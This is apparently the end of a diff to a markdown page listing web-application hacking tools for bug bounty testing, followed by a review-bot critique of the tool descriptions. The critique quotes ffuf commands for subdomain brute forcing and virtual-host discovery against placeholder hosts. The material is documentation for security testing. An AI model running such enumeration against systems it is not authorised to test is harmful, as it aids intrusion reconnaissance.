     25 + 
     26 +These tools offer a range of functionalities to support your security testing activities. Remember to use them responsibly and in compliance with ethical guidelines.
     27 + 
     28 +<mark style="color:red;">Note: The provided links will redirect you to the respective tool's official website or GitHub repository for more information and downloads.</mark>
     29 + 
     30 +<mark style="color:green;">#bugbounty #bugbountytips #cybersecurity</mark>
     31 + 
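Review bot: the FFUF entry ("used for discovering hidden files and directories") undersells the tool and contradicts how the recon page in this same commit uses it, where ffuf drives subdomain brute force (`ffuf -u https://FUZZ.HOST -w FILE.txt`) and virtual-host discovery (`ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt`); describe it as a general HTTP fuzzer whose FUZZ keyword can sit in the path, Host header, parameters or body. WPScan is likewise mis-described: it enumerates plugins, themes, users and weak passwords and matches them against a vulnerability database, so "vulnerability scanner" fits but "exploitation tool" does not. The page is titled "web-application hacking tools", yet Nmap and Masscan are network port scanners and Metasploit is a general exploitation framework; either retitle or group the entries by stage (recon, content discovery, scanning, exploitation) so the reader knows what each is for. LinkFinder and JS-Scan have near-identical descriptions, so a reader cannot tell why both are listed. The trailing `#bugbounty #bugbountytips #cybersecurity` line and the red "Note: The provided links will redirect you..." sentence are social-post residue and do not belong in documentation.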